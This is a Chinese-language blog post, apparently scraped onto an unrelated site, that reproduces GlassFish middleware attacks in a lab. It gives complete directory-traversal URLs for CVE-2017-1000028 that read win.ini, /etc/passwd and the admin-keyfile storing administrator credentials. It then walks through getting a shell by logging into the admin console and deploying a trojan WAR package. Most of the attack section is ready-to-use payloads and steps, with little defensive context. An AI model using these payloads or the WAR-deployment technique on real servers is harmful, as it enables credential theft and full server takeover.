GlassFish中间件漏洞复现 您所在的位置:网站首页 麻城市人民医院电话咨询24小时 GlassFish中间件漏洞复现

GlassFish中间件漏洞复现

2023-01-19 22:14| 来源: 网络整理| 查看: 265

GlassFish简介

默认端口:

使用Admin的端口 4848 使用HTTP Instance的端口 8080 使用HTTP_SSL的端口 8181 使用IIOP_SSL的端口 3820 GlassFish Directory Traversal(CVE-2017-1000028)漏洞简介:Java语言中会把 %c0%af解析为\uC0AF,最后转义为ASCII字符的/。利用..%c0%af..%c0%af来向上跳转,达到目录穿越、任意文件读取的效果。 影响范围:

低于4.1.2版本(包含4.1.2版本)

复现操作:

访问

http://192.168.109.161:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

image-20210514004508583.png读取到admin-keyfile文件,该文件是储存admin账号密码的文件。目录路径在:

glassfish/domains/domain1/config/admin-keyfile

访问image-20210514010456571.png

http://192.168.109.161:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains\domain1\config\admin-keyfile

linux系统同理:

http://192.168.109.147:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

如果不能成功读取,自行添加 ..%c0%af 即可。

GlassFish后台getshell

访问登陆页面报错

image-20210514120447339.pngglassfish4以下版本都会遇到该类问题,需修改glassfish的默认admin密码image-20210514120646857.png设置安全机制image-20210514120818084.png弹出安全机制认证,接着正常登陆即可。image-20210514121222132.png成功登陆访问。

复现操作:

点击左侧Applications,接着点击deployimage-20210514121411513.png上传war包,填写Context Root到访问的url,点击OKimage-20210514123007228.pngimage-20210514123021519.png上传成功。

如果报错 A full JDK (not just JRE) is required,是由于目前使用的解析为JRE,需要调成JDK解析。image-20210514123916821.png

set "server.java-config.java-home=C:\Program Files\Java\jdk1.7.0_80"

测试war包木马部署情况

http://127.0.0.1:8080/[Context Root]/[war包内的filename]

image-20210514130309701.png部署成功!



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有